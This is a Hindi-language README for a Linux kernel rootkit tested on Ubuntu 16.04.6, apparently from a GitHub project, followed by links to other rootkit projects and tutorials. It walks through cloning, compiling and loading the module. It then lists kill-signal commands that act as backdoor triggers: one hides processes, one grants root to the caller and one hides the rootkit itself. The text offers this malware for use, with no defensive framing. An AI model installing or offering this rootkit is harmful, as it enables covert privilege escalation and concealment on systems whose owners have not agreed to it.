
ubuntu-16.04.6 (Linux 4.4) के लिए एक रूटकिट। यह किसी प्रक्रिया को छिपा सकता है, रूट एक्सेस दे सकता है और स्वयं को छिपा सकता है।
यह एक रूटकिट है जिसका परीक्षण ubuntu-16.04.6-desktop-amd64 (Linux 4.4) पर किया गया था, लेकिन इसे विभिन्न कर्नेल संस्करणों में पोर्ट करना आसान होना चाहिए।
वीडियो का लिंक --> https://drive.google.com/file/d/1yDktAg9vIPBH3OPEBYset9OdQb0LMevA/view?usp=sharing
रिपॉजिटरी को क्लोन करें
git clone https://github.com/Asekon/RootKit
फ़ोल्डर में प्रवेश करें
cd RootKit
संकलन करें
sudo make
मॉड्यूल को रूट के रूप में कर्नेल में डालें
sudo insmod RootKit.ko
एक प्रक्रिया को (अन)छिपाएँ (उदाहरण: PID 500)
kill -0 500
रूट एक्सेस प्राप्त करें (आप कोई भी PID डाल सकते हैं, 0 होना आवश्यक नहीं है)
kill -1 0
रूटकिट को (अन)छिपाएँ (आप कोई भी PID डाल सकते हैं, 0 होना आवश्यक नहीं है)
kill -2 0
मॉड्यूल को रूट के रूप में कर्नेल से हटाएँ (पहले सुनिश्चित करें कि यह मॉड्यूल सूची में दिखाई दे रहा है)
sudo rmmod RootKit
https://en.wikipedia.org/wiki/Rootkit
http://dandylife.net/blog/archives/304
https://github.com/nurupo/rootkit
https://github.com/f0rb1dd3n/Reptile
https://github.com/m0nad/Diamorphine
http://derekmolloy.ie/writing-a-linux-kernel-module-part-1-introduction/
http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html
https://yassine.tioual.com/index.php/2017/01/10/hiding-processes-for-fun-and-profit/